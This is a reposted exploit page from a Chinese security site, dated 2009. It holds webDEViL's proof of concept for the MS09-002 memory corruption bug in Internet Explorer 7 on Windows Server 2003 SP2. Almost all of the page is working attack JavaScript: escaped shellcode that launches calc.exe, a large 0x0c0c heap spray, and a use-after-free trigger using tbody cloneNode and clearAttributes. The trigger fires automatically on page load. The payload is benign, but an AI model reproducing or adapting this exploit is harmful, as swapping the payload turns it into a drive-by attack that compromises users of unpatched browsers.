|
MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)
|
|
来源:www.vfcocus.net 作者:webDEViL 发布时间:2009-02-23
|
|
<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL -->
<script language="JavaScript">
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
